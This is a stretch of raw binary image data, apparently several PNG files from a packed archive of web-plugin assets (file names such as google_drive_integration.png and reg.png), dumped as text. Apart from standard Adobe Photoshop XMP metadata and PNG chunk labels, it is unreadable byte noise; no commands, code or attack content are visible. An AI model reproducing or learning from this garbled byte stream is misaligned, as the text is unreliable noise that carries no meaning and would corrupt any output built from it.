</rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�8t�IDATx���	pSu�񼗤i���El�B[)�-**���:�x���.��ꨳ׌�3�,����^�.+��.����x, �B/��L۴���K^��&iIk����g�󚦇	_~��^����j%r$
�D@�H Q$
�(@�� Q�D�(H�$
�D�(@�H Q$
�D@�H Q$
�(@�� Q�D�(F27A_6�Ǎ�ֶ�^���H�$
�D�(@�H Q$
�D<�*�i��!]3�D�@�uvi�6n�� Q�D�(H�$
�D�(@�H Q*�/�����_WTV�=���9�_]Ј��ri�掻���9y��$�P}���m_�<�d�ꊍ��|w��UUU?�r���I�$�>=��K%���F����\n�\2sw�"���=��:�?��U���a/�w9w���-[�F�Oپc�.� �s.�N!Q��]*�IJNT��4.W���/$
��nki�P��ri�8tT�?��	��q�(4����]"ƒ+o3DE)�9Q��wG����ŗ.�9C�Pm}CyeՁ#e.)/�&+#}Œ����������'zW��*-KI�����D�1[,~�hEq����̚R�b��7�YZv�ӥw{}�5�NT�{�Vkθl��z�����^���IZ�o�R�{�KtZ��ݗ?}���j�-��Β��5�����NLHx���y�i�Cm��-�?4�ļܩE��y��~��7���j_�����-�)m�}���jyc��o}��$����W{WFE�ڒ�)3��HA�?|d��2���qDz�����,��a˧;��-�w<t�s�M�=e�4���}��M�}�l�+�zyC�?';�xu���J7�ص�'K+K�4�x��);��1��R�(x?(�ͭ�)oM�W>��`BA^na~n�%y1��A����C�Ƣ�^��t��ɗ�V[�w��LQ����N����H�6�[�}�3��]���y#!.N���S��|ˇ�?����]�q��o?߳��� �m:�����v�}�U��g�A�(|�Ϻh��Ir�է��ſY�������Rvc��?ZQy������\]CЯ_u�����5�ܕ���j���o����y���;�)���;QS#�b}Cc��ʡ ?S�
䍲���K�k�������b���ٙ�Y��F㓏�Y���]%�Q��om���V�g�M�a�B�r����=J+N���&�hLIL�3m��y�+�����+2}���j���u��wJ�
�Uw�������SS��z��c'Oo�S�^�V��a���$'����)ﶴ����_��RR�Ϯ߸b��e�i<~�k�����5�9e�z���k��.��^ ����:s�V�[-�<y�lVF�򮥣������vʏ=2���=_g��\��}�����/�=�X���bc�DA=�v�?�26��*l��rn��6�7�_���~�pv��wLJ��ܜ����X��6k���(�b��#����'9c�~�Ok�^?\�U�Ә����?_�+	��u��V���m>_���΍.��^��V���qS�(T��g��o5�����-C�P��E�*zHs7�BE�*#T�U��b��!Q�h/T��I魵��g�pD7�ƍ��/~�e���[����ܭ�P�OA��g�J�C[��k��$����x�S�*a���;���=Oݼ}���n툊��e��0�}����_�*H��Y��H������*N����D��+G���>��vO�΀'L�b�z��磽׽�!��*HC]���y�{��{��JIa��c�*k]y���]���r$��-t�;J�wM�]�>c(HC8G/p��o�*�R)�"�z���v;6���	��@����ԳM�$���'Z4�{��P)�"�T����Fh_`�(�a��{��ۊD��F(�"��D�_� Q{�~��'ZB�(HC�Е�{a 'Z�D�P59�E���>�❨�h!Q�k���lj���'Z��J�$��$:��D QDh����e��(�Zg��C��$��2B1Tx6���Mm/�ꧠ��5���'#�D1���[?W��f�ĉ�I+^F(�BMYr��D����D�b�,tY�(F���J�@�qr��D1��?
K\@��u:1BA�*��r7�[�v��$:�%��Fm}�cH_s���-��W��$o���0B#��t��I�9��|+m8��%��3kp_���<���{����?��j�w���Y�I~ױ�w�:,o�匤E9�bH�����vu�_��폶LL2%��h჊����?���|nE�0�h^�a��u^{����
x�A�b���L	���7��O�{���c��:F���Y��
��I��f��knm}�����MKI^0sK\��ht벛w:����*]�ҫcR���;;���iS��L��Ss��U6����O4��0K����7��>y�H��k�.Yx���RI��+�^�a�6%����Mn
�+|��'~�PB�Q*mY���?�Hc��՞gHiniY��M~W�?}���1BY�^�^s�}7/���ܧ���{v��g/�0������,
��O����lx�e�>�oYt��;o�>�,�x�n���g������\:6���a���m��+���������p8�'N��9--��j�i�𡣔��'/+o������ʓ��/m0\9g��VΞR��:�#���^z��Uc�,t9E�n�i�מs�%z�w���vo�<o�K�γ-j�+���|M���z�-�:�=nGm[?�.Z+�)�N�i���ɏ?p��yO�Ŷ HKn~���.��hB��d��^��O���"���,���>��(����b4R�R��]].����~~H�BItt���Ӎ�I���P�\5ʋz�zqRn�!���̢�x��ȳ�(B�]pibZ���TQ��i������ĥ�S�e&���/ώK����|Ә�>��웫;N�U^�7��x��x}ϕ/�L\�3���!d��(B�>>W��ϻ���Y�
���������2t��‚��;'f�J�$�!�4m�#�]���LnB��Yq�U��<�`^�w�ᤋz�ɾXJ�����Q"e��%RF�<E�ꦥ�OO3���+��(�J�E��[Ks�����}��3<���ԷIe�+��(��R)-KsS��Q1�`o���{
�k��%.�b@�3/��a{K��G���''ZHC/)#S��������(��g��@�h!Q�Ĵt���֖��<Զ�D<�D1�LcҤ2�m�������^���z̖�D$�ᐐ�*�c�v�8B݋ၟh�O��#O|rJ��≖ #��DLQ7�)�3Km�(�:JԽ��ˉ�(�&6!1*:Z8/�;-y8.�"���tQQ�h!Q��R�Nlj�z��'��h!Q��!&Vo0p��G�#�?zC�Y���8�B�Pe�Q�T�����ha�5�����j{���DS����5N���
��P�(�Q��4���(�]i�cw9�B�P�]��y�"���B=<��׸��`�"l�2BIj�Ty�1n
�Pe���
����)
uUʍ@���+]0KA��loC{H��tj�G�c�j�n�>�U�m.�V�A�[5�O��a��ƾ(@�� Q�D�(H� Q�D�����0E@�H Q$
�(@�� Q$
�(H� Q�D�(@�H�$
�D@�H Q$
�(@�� Q$
�(H@d�_��Y���b�IEND�B`�assets/google_drive_integration.png000060400000020347152434416630013636 0ustar00�PNG


IHDR6��_tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:B788E1AD306811E58FF9B9BB7019E9F2" xmpMM:DocumentID="xmp.did:B788E1AE306811E58FF9B9BB7019E9F2"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B788E1AB306811E58FF9B9BB7019E9F2" stRef:documentID="xmp.did:B788E1AC306811E58FF9B9BB7019E9F2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>*�\g\IDATx���dUy��9���{�;;;�,�<"%�M0�eH���<P
Q��*SI��Z�M)�V!�b���T)j"BI
��
��a��3;��~Mw�{��=�qι�{�q����v�{zgf�ί��|��P���	`���EP(
��(
@Q�(��(PE��(
��@Q��(�EP(
��(
@Q��(PEP(
��@Q@Q�(�EPE���_?6�����x�
��5�yj	��(PE��(
��@Q��(�E�,���C+G��� ��q���i@�@Q�(��(PE��(
��@Q��(�EP�@c��N���6��K��=A��8��x��(x�~~��[o�~�'�����ߣh�_�a��|Gi����@�V:�S�YF�^6]����c�u�v>�щJ#C��4�O�I��o�#���։�t���y���ŇЏ=�Ov�]j>93H��3��=���r��o,|;���탹C�?����̖,{h�CO�Y~�,x;8<����\!����Q�TrƁ��(��O�ܵu���O�'��ra(��'��X��r�ɾc�(a"�R~��:��Yl>�J����)q��V�W��T���)�v(
�:�f���ixm8���
ν�+.�2yGD�1s�3��fnKco��\��ʏN�|cb�"���P%��^�_�k:3A����#����k��o���q2GT�'	�T�(�;���I�'v���>�أx��(x�l����	=c��29�g��g����H��H8U�Ur�1�,1��K�}��Jƶ���=�s\(
�d���~����������
W�\��O�XFt�k��Hb>&���1�Ekg�ޝ�C2�b����B@QПa����w(9#?�~
J�����rp�d=���0�E�.�gbz&K��w���|g{�*�CK��z���4�Yv߳����SS)����T�[.f\���F�흉aF�&�^�YF�+W���\��o��/����@cˉ�ǿ�5c�A$�ň Y���u��9c�A�)1��Pdcz���������:?;1?;^)R�b�z������푻�ܡQ��x��Rb_%.��C��Δ����LM�Ӥ,�e~���W��U�y�𓧶����s{�pi�( e��v���)��A��#���]"��R�e3�r#s%I�H�x�%�?�� ����䑝C�0���!�{��U��ȃ��In
���7�}[i��N-翰�B
�	�r�	���^�@̕��J�*2��z�J����X���FP�e$C��>�h�i��8?�k�����#*�}y��_�,�d3yn�m̆��T�s�'��(K�pv��uk��($2��.�L�JA��!�}z����F�9F����h�pn���,o5��/�,�����Y2�31Q*��N�m�N�Å�\e�wiv�w�g����t{!1
U�y)
?�0yф�]��U�4Szn1g\9c�1���U!�	�pW?԰���W���a���zx��G�-����[�$32S����0&��ԉH	q�wL
�7l��!lr�4�!���ETm�IM���������JQ�����<.=��D�~�k��Kh�շL�x�PPԥ���Հ�݂�����w�X�Kl�&5M�kHl�^�dR��i�/��r��Z_Zĵ��������p����ң���d]G��G-��RP�	b��/��eg�ʊ�*�Xvc&&�*oij��|h�Wwt��1P�Q������� ��!Ԧ����Fŕ$��G	�
�"����d}�W���j��O�H�˅��g/1��(����d��]�;&
���U�m�ުUq��eK�=r�_����q��+��>%���Z�'����Ԧ�Ή�+/�d������H�S�F\
Ă�kH	�U�}��cj�J��g�^å���6�~b���R�^]k4PP�"�4�o$#,\S$C��t0����S��5+Ek@�f�#�[��u�{i(��e+j�y �fW�n6�fٷ��[竉���EI�QBNG�[>iX��{k���Ǚ-tZ���P�BaS�7������BVod���:�vZM\S(�y(0��۞�7%�Q�a�61sc6SY�4�`�h�A,�"�='_�\�Ҥ�rqR��4�)xJΞY>p���g��9�C�	��n{W�n�7C?��We��h�Hjq-��	q�FG����C��#��5�!r�БYĢ�`��3I�Z(����Tpݵ���|�E1]�|$�;�6..��شޚ���ݺ�]c#'#�|�������F;������C������ZAl"X"�
U���#���]q�_��l������R��R�$)v�u���Pt�W�ny���OB�9�~��h�A<F���1I�f��*O���q`�V[��9{��D��Ҕ��|BGJ����9�B�1���S�0�3c��*,���-Y��}�i�'��o/ō�����n��i`j���x�U��F�[�W�!�ti�Ҫ8$�6N��0bh�Ja&������2��l�$���n�����'�V����ͪ�ʔ��i$�EԈ���3rNa�M~8��5�����Cèi�*��D��c�H(G١�[�̰H{�1���O�.�8�`�g�]����m�Jj�N�tS!�f�h�W^��$g�o�y��dBÇXZ�Ꜽ�N1,��Y�x���d�(�����ϮS���pѡ膡lQ�5n��n"�L�p7�}>�`�1��J�h���z�cj�'�s��3�7)�w�f�H� ���Q�O�xl��g[��3�u���*�
���F�e�-�&�n��3�	5�$cT�Ɔ��=k�ҊB�E������Cօq":(tz�o��?&��-Yb�G�7]h��Pt�3dӽ�<\}���d}F7ڌڠ��k��Ɠ���5���:��G����$�֘h�P���M�c���~�?�Ɍ����Z����S=��Pt��O���:����ā ��0eȪ��u�fW�ڞ�J�bWu�4KGG�Si*�oY�Ƹ�(�,Bi:?��Pt�W��쾩��j�>��T�UH��cE�����≖��?>�\;�}]�-�[^c�]�:~���	Fue(^� �~��ۜ0��>;���Ѿ��g����,#e�|��o�%��n@�����\6����7SU"�H�^���5V��O���h{Rז�V�GT+�M��j]��S$�F�\�=8�yl,g?oM�[]G����G���u�pMcӫg{�ؚ��['/�M�P��{Ԣ�W3�z�U~�z����o�J�]i��U��`���b�|}��g�Sn���H�����9��B�uH٢��ⷧ0~�{�u1�$g�gTx����m�7�\ku�tԢ�K��%>�X=8��r_K�h�~7X��;]^k:K��b���pV;���i3:�LL� )5��_���0���9Ά�Pt�T�>���UH$����8
V�'��5p���M��Pl[^�l�˗�s�ï�P*]���]�7�ŕ�Bթ6�V��Ǭ���Y��P��^y{�ύfh�fk��G�-����w��G�>M���P&V�Ƴ�A��9���G�[���;�_=��<B�(��ͯvf����2	�2�ܜ
G��%cn����XwkNu�m�z.�C7�CV*�����m3���.T��-����}Wo�'�˚�d���'1��7r�83��^^s�%�ў���z3���ȟq�qy��V��r3Z4du=�j{Ն�\sW���{�,�JW�U�C���+�e��P��gk�����wWv���Q���"��(����
'�>�7��$<�%���<e��Ι���V��q�ƻ"Zw��g<S�{�y����WoIQ-o��OF^�E�L��H{]���:6�����Em���O��:�H��4���-��4^i�W�[r9������w�v�m�r�,�o�%�U�B��m�m��|���O�7��.Q*�&�A�GS�2�RO�Ҡ4w��j�e���0Š�C��`[�Vs���b��U�������f��O#K�A��p4)�R���_x/s�+��ī���'�#�:��6�a�N�bk�](JA=�\�U;�V�=�<�t�\��A"�	�ß2j�D]�׋h�%��������ׇϻX+�
E�-�o�	��D����,�~��_��#?�J�)��ڍ�c7��W�O�aĎO"�e�O�L���#�'����wsx(��%�.��N��4NTmJx�a
�r�`�*�K}��jS���폝��(�Xv�����>ש9���Fp�݊dM���²ny�2wv��9����z,���4s4�,[b�O}���}o�P����R��3-O&����'�H.�%j�)*�:�8R���ˎ@���շ�������e<(%*�q'x�2K3)�̳VY7?��54��0����jBJNe�e�2�䢦���Li����
��f�g3��>,�H� �e�R� 
����a)��
�d����K*��q�鯮�R�0��Vo2I�2�=]!���KK����i��L�]����	��N-��уq�[�� Ӈ�RuƋ�a>���!���.+-!�B�
���o/|��3mi�t�H��c?/W�4&F�^�dk�N�(g
�d�b�9��Ʌq��<k�$N>SS4���Xo�
?)5�l����+�w�Y�	E7
5W��מpq��Q��q8����(����vcx�e�֘�����I��V=_.+?�X6���Fs{�D��5}����<�I�2*�ϳ�-������Bэ���\pC�ʛ{>�^3�of"���Na��p���˜�b�I>8�cG�R˲CԶ#?C�DF��G��YA36����d܆W��'�}ϵT���F���ݧ�abY��5����a�{����q���u�_�0e��(��m�u�)q�p�|A>@��UdA�xJ���55��Ӳc�֒�
E7,�]��W^�#?f��3�뱨09�Uf.�=�[�'��������G�$W��(�j�	$*�5�P��[���$`����h���'o����`���T]~�y7���p���p#�u3-�38��RϏ�̋G�~~�X��Ur�^�Km�7YlG\������h�Ȇ��߿�@��b���,9�ı�^7~��T$6pS,���-
「�x�SX�OO��-˔��XPV�H�C�]q�
-��&S�Sb�-�������w���|ii�����~�듑�h�����Us���.�? j���܀��O9 u��۫'nbkTQ����Q�4���|��o��_U�S\G�O(�)hy"���W��t����V������G+��g�X~8X��UH���}����\>�g��3m�}��lj����n���y�P���!��u��gN_�-�a�%z�[�A�wu��&���Dҧ��o�e[��6�̬O�{�˘h���
/X�����~��'X���M���gu�e뾟V�,'W�Hx-��N�3 d��`?h�5T-�5��b������;+_a˘h����G��󜝅񾟥�r���s�SY8�)���v����e&u�\��v�E��۶�e��S=������7�B��f�}��e�v{�ȁ+y�%��[�b��
cY`*���ěǢ�)�&I�y�a�n�K���d�~˥��-�X�E7���<�
��M�f��G�_Y����,0bY�*ߺ�\�>�5��F{�٧�g%)���n&�V=�C̞�����^[@�(��-��Eﲩq��Nn����#����(���V�n�G7�ݭ�^�A��0^�<,���C\�v8�z0q�w�o~��h�0�E77~�X���O���r�5r�
{u�g�,[��Ì�)�uX���5�0ƢQ��
3y�X3��X�o�h��u���(z\0����ډ�0	[��*��8t�SY��S.2�f&�q�y.��AS.�!h���r�px��~GRb�	�Tn��k1�E�x0�7��س��ˌM]�HQ䳦���xșV(���v8�L���	���I"�UGs��w^rv6S!UL�@��EG�9y�i�����˵s�&��o�%��1Ƣ�1}S������Zq��T\���3q��3��B!��u�O��_d�Fg�E���g����D��$jB���	�5��E�6s�z���D��:�l��b���C'�բ�y������>���Q���N�z_�ySm:�#R�}���q�_�4k�}�-��v}O��q�l����3V��Wχ@��Ab4�g��Ok�΂k��o�1�18,B��f�W`����/�
�d�J܁��u��R\(z�Ruk5���Zg�w���K���#~~�htԒ��Tj�2T����~��7�Ƣ@3:�c�	'��;�7��<�>q&���,����߃I��n?BE�sF�m����$�(��q�k�Ǩ�zk�Şw
�`k[:1�k�83M��|���X3NqI��<
��������Ht��`xb����$_3�MBS
���ܧ�{��ODQ���synF��(��~�U��pU"DQ��:2�=B�*QX�M��J��*�e:�=BxDE}�2�P=<{,�DkW�k20�ŗge~��S,�$e:&��е#�DP�D����!��8�'����e�C(�DP����G|�KK/p���G�A?(
~eK�F�?��˘h��`�Z�g��j���r�Dt�k��h���XS�Uj�V�K���!��k頯J�^�D�Be@Zڨc���uJ�\���f-P�SrŒ�N���D��҂lI��Qߓ8�M�(m5B�:��7���b��!��u���ؑ��e,�tRA���(XO�R�u��{E�z�4����}O0�6�����"��u���nq�55�D��R[^P�=L� ���R˲��:DQ��^w���`�*�(X����a���;�!�.X��Ƨn�O(
֩�$8rO]�^-MmEE�<��:��y.�
��"�x�~��1c�J�ok���<�g�W�U'�Ս񣮕�n�:2�Dl攷��Hq�(Xw�(
6���u݃rb)@@Q�(��(PE����,]��)V���@Q@Q�(�EPE��(
��@Q��(�EP(
��(
@Q�(��(PE��(
��l6�_�������IEND�B`�assets/reg.png000060400000011326152434416630007340 0ustar00�PNG


IHDR6��_tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:9A075953306811E58C0AE70ED85FE419" xmpMM:DocumentID="xmp.did:9A075954306811E58C0AE70ED85FE419"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9A075951306811E58C0AE70ED85FE419" stRef:documentID="xmp.did:9A075952306811E58C0AE70ED85FE419"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.�tKIDATx���yl[��q?;>b'q��h�6�J����z��Q`���M;��i���&��K�4i�6v��@�@�@l��uC�J[�--m��Nblj���{~{���۹�~�I�ʏo���޳P��E�b��)H�$
�D�(@�H Q$
�D@�� Q$
�(H� Q�D�(@�H�$
�D�(@�H Q$
�D@�� Q$
�(H� Q�D�^O�l������?z���(
�(H� Q�D�(@�H�$
 8�E �=�g��D�����p����.@�H Q$
�D@�� Q$
�(H��狖�~�`���r�9��!�H(E�h4Z-��-���������5��\�(�gxd�s�������v���/$n:��7�ܶu�
[�-�=E���=��=~B����r�S�W��|��{w�cw�LF�IE���գO��/e6�ٯ�/y�o����ݻs;�gI��Ҡ���~��'�1�>Uc>���ǟ�Y%QdG0���|���,>汓�|��?�%Qd��m��P��wp�;?��kZ�(��Ï�τ�a����$�<�$�L=~�ęs9����W�q�e)��&Q,��}:[y��z���D�8;tX���l��q
�Q)�by5o�:u��1�q
�.-6�P����I)_C�"*�o��h��Aoon��FQ���G����I�=80����o�h�e�1���F���=&KQ�s�?ꖣQv�"�{zC�x��|o��O)rx\N*%Q����ydy����jT�!�splx�}A�Hc��*�v�Cӟ�+���'��(�ٮob�v�H���8��#$�B�H����OY����(�E�¼N���8�v��`H�;**�*3ޡA���8����SK����u9yrH�"f�Ti/k�����a�[���SP�L�����\5��?A{&>��QQ��
�P���>"ъf6�
��%5��r4��D��������D������@۵L-G�R溓�J���jm�2��V����IV�ͩ���O��3�^#�1e,�[���"�J�a�ڂl��ޞ�gR����uiT
���M*�5^�-Fm+��9g>�o_��s�I%N�A�36��r���ĸ��"�ʛ�M�5�<oT�b۲�q&�#�g�P��GT���?F�$Zy֯l��W�4'�l5o��P
����4�GBAv�V��;n��;Z��٪qNV!��;���R�,���6�9o�S�ܾaݢ�T��WHT::�`��h1Y�״��ms�ڗ�ڬs,;�8O��Ouz�ɥ$ZYnߵ3o�ڴ�y���x���d�j��(s]�'�
�m�6�9s]%���:5�U�}S����f��
C���b��a�uy��Ǝv�ɴؙ�>~�d����⢒��0$Z)�ٕ��|l��j��3۩8�㤠�l����q�g�V~�JI�"tnܸ��>��hmlXѴl��N������&R�Ox�؃$Z�f�=SC\�ܵggf�Τ�36�jF��%�����=�w��x]��|c����f��i~����>v"��3k�}߶�9z��؟ř���9-q���8��D����j�u�5��G-qf��S��z#\�+�(򡥽��[�����5��Nm����{D�!v%���N2>�_vҕ-�;6m��S�0���3^�|
8�����m�mߒ����Xv
�t���W��	1$Z�����q{cmMV���:���h٩�9c,���|?*I�,�CI�շ�޴iCj��>s�m9]v�3�����LL�c_$J���=�����>��eg��9�g���$�2Ծ��ci��lj��c��<,;�����Lٛ$Z�FcC]�R���^��V�PTJr����q��0���0�ymY�vM{��Q9�n�e��{�<|���Rl��1�m�u�j�ۚjg,2�f�i����-q�h��z/�
d�*�W>yP���u:�=�?v��E��_JQW0rz��iטw��?��yzf�Y���,G)�D��c�</e�����b6u3��	G��/��<�=�>1���M�5�3m��J֢e�c�?}6��5���%��n�S�]�S����d�сQ]�*)��>5��hYy�^��k���k���ɫ�n���w���<�~�?"\Ӳ��-;�D���g����kC�<v��v��3�#��Tό�Lx撣�ڴ���8I��8ݣg/|p��kC.�꾻��.?��	��5�g�_��R���Ѩ��۠�p�|5��7:���X�`1.�O^+"ђt���ë�g.\x��Yy@�ټs�f�T��6���Ks
���V�Ym��f��>�������\��I�$ZJ��=�z�9N��0�t߷�F�^{�@��~wP��p|�T[�Hy'F���ۿyY-q�h�������s���R�#���r}�Z�˪��,�14�U�Ҽ�2�Wz�c�'���S��;y��KW{�����٬�]kW��&:9?:�
������ټ;�e�I�����G�x�R��|ntǦ.��0�VA����Ѡ���7_�Uz�$ђ
�����_��W.oM=}�/%ѝ-��I��}�D,��z�v���T���tY��������O�!q�h	�|?x�A��0��Pm1'���
$'��
mJ�s���X�5u��J�(q����S��T��ROK����F�=},�8>g <[���(Z2^?y��Z!?�ZN=%]A�,��n��
'�h)QVtO:\�?C촘�#���^n�6��s�l5�'�hi�p���-�A��W-�߸����gB{���[5�I���n��ٮ~��;q��U_R�又�b-m�=W�gp{��FhO9�/���-Mu������؋���PH���LtK��]���p�J�%�65�1��a�m�i�����F�8���Ag��px|��K~����|�3{>���=N�%�7^�O싈���7T>��5�:�A�$ZjK�T_�Ȳ|�	m���V��)�X������׵R=_$Z2��|�3\�j���_�q�a��IF�~_���������n=�n9�;wxE7g���}Be }⅗���/��&nԚ���k�O޺���N
�)_�>�2�~k��5�hI*��Dx��3��$]е����f����{�l�{-^Eu��~4�B������Ѳ�V��?�w}{M5;�DK�D�\�r;y�9m���
����|�u-|(�A��ͫ��g�o���hQk��O%7�����Y��y�͛�mݺ�3�G�*×�t�_�t��~��?˕����}�M{�9P�D����'F":�ͼ��ԏ��b��8J������nU���Zɾ#ъ`0�kj�~IK5���^�/����1N#Q�Q��Z�T�_S{��@R���8�s��>F�$�Tj�
M�G�R���qxE�VUY��J��(�:}��$�df�-��j*e�	-�J���` V)�N�hq2Y��J�K
����3n4IbDN\W�e'H���
�S1�Q)1�2��c�JEQ�$�df� �b$�c�E��T=i�8A�EW�2�JR�Rf� �b�T�I��(�e�8A�EZ�N��N]舙-H�X+M��
�'H��*����8A�E:�
�<�UɈ�DQ��Rqy���1)H�$Q�ɇ҃D�܂D�(@�H�$
�D�
���:>2���I�N�x����3Γ@����Eׂ�7��<]`��(@�� Q�D�(H� Q�$p��Ykc_�(@�H�$
�D@�H Q$
�D@�� Q$
�(H� Q�D�(@�H�$
�D@�H(7�`O�	��eIEND�B`�assets/conditional-emails-update.png000060400000012113152434416630013611 0ustar00�PNG


IHDR6��_tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:D449D655306811E594C0F905D1A58E1B" xmpMM:DocumentID="xmp.did:D449D656306811E594C0F905D1A58E1B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D449D653306811E594C0F905D1A58E1B" stRef:documentID="xmp.did:D449D654306811E594C0F905D1A58E1B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>���IDATx��l�}�y|��HJ�^��z�v,?��Y�fM�v]�%���	�ذ6X��0`(�eÂ�0VŀY�%-0lE��@7 ��$MV�N��8��E=(�zR�O�D�;�o����pw<>tw?������N2�<b�bd�(�(����(�(����(�(����(�(����(�(����(�(�(���(�(�(���(�(�(�^��&���a#T�W=����DQ@Q@Q@Q@Q@Q@Q�*@7z�Ѱ!��ך��:q�	�HtPPEEEPPEEEPPEE�8�^��$�H��{?�>z��u��z�3�6�og��(�qY�����wMMN�L�{C�H��,�����(T��`p|�=61᚞��xf��X<���,�W�^,EQ� ˫��.''�Ӯ9���r���c)�B9�eY�L�NL�׵`��w�$	KQJ"�g�&\.���ff���h���W|X��pck�c.�X2q�����5����b)��
B?��/W�{zjvnj�����He��JRc�~v
�޺���q��Gr���u�;��P�;�KQ���;Ͻx��O"��~�R2����x<���R�C�J1������a���²w�����S��KQtBS7,%��(��थ+>/E��r�д�WX��Ptjp��KQvMG��\��ƻ�������-����V�-S��m�*ISY)r��l&�}�
���,V�E�Tq�\$��a�}����;��js8��$�PR�[	��gs���Zh-�VFQУ��M�"%����� $�Pd�n*�f�����Υy��i��km[Ea��?����n�ٴ�P����bKQ
4J*g �g��щ��
���o���͎�P���s��񧧇�5f���!��6,���P�c�(}a��������9a����(zs��C�}��
�tv:vY���'�ӗ._q���Vi��i��f?������ek4S�+�Eo��<��C=�ʅb���~�>a�?��0��_��l��p����gߘ�2:���TU��Ŭ�RÞEћ!x>𙳏<x��d�Z�Ա�C}�O?���VG[�;��\���B0�zW���-�T���5�9b�
]��_=�`?��;��[����
(hu���c�~�!U?_���/�?�r��7-��F"�h�]��{�G���g�\�i���|�]R���{��Nok�g����/���D0ϙ���E��Dw�b1�}���漾�������f;y��ݧnW�p����8��;�.{��M_:������x����l9�Ch��
KŬ��!��{�;N�H\G�'��޳��V�9�_\�շ��bI�s߽��W�mO�7uh��OnhR�lC�g���_��ZR�ISr|cHD,%��c�s�i�����w��)?�\��o?��rI����ւ>�Ϝ�첧��M�tn���V�����_�y%��;!Tʌ�����qv:����c�*�����YZY�^��;?�I�����lI���?�{��fe@�t؞����w��YWvGb�|iT<�DCwR\��۷��R�34w���"�U]3�H�y1�Ã��Pʢ�ښo����#��B����F{�K.�.<��eB�~)3rj�
�R�E�"_U�^
i���ȵ/+f�;:
�s紳���^EZjUz��Db/]�|'?9UZ��������,'Č� �����5��N�>	�9KS>476�,�rq���OU?E�eW��V�$��U�\��(�k�땳�ť+G�����Ӿ��
?�l���%���ٞ���ko5j��N�?��(�f[�ْ2�w!=�fX
(�_l5i-���
np
�S�
,���`ҍ7'�^��֩�v{�(r"��c��G�cr���j%�xA�ېHp$h�O�n��4���~4�y�;��+�'��-�_��Z4��~�.�OC�V"��Z�H�XJ�)��Mk�
��[k,�ٌ�i>�h8.?������o�u֘��V��`����_��J�-�WKl�:U�W#�B1����}

9V6�N�Cyj����Y��;s�WV���Kk%ƯB[��=�R�����FOW�:JG[�I������ô�M�X R��kŐ;��:Y�R�Eu���rvxh(�hG�!ML�wըd��rЗB�8�(�>S���j�:�Z���7�K�^+�t�rv�]h��O���Z�#�_gS�K���ՙ����._)5-��7�9�;HQT'����޾�\�Ҵ������Ns��������J ��;*��B)n�B(�nBs����[��}��kA�
>�ķ_y�-��lC����y��/�U����B5t�*��xKo��#�}V��~�����ʅ���_��Z/y��ǧ�:	�J��Kq%�pItu�O~��]�s��y�?����fKL�)�.�?�B.�OϿ��������𐿩�o�l%*�m	E�
��B��//<�?Һr%�H���ſ��ws_
�+�J�����-^;��>u����u��٬�p$��O^|�C1Q�ERe--W+ꢨ�	��BT�@&�����&��bE�0f�IEQ�U�j����P<DQ�r!}T��s��A�E�TG+�޽�����-��g4�B4���qӤH��`���%����p��쁦�ͫ�(��(�F7����L���d[&%y6�S�����ט�]5��B+�.���̻hK��%�w��YAc�����EA�Pe�4l���b�֝|Uߐ��PA�r��6^5���
��(
�����Z��P�BMO>�E�
��j-b�����bQ��\�Dir���R�7PhAQ( �f��h��q'_��ز�BQ��-��(솢yZr�U�V"B(��&�}��;s�h_w�î�L7����D9��/��g���R�68�����e9M{�n�_���/��]��٧���d�V"������=c�Z��.�H�K��љ�����iO���Š�s7
-��(�,��r<uh���A���Z��}��F+b(��<-͠������N����շ!�o!��E��xH�E!���q���w41JRs������1+'��%��'t��/x��xq�RhAQ���m��)K�����JalGKSgk�Ç��,c���y��+���1��B-�?%k�����"�qX�F��i�����x�3>�ǟ���QhAQPX�uM(,�(�hөPVc1�wvtuJƍQ2�Ѩ�#��w͉�gayE�UZP�KU/�̸[qƘ\n�X���z�
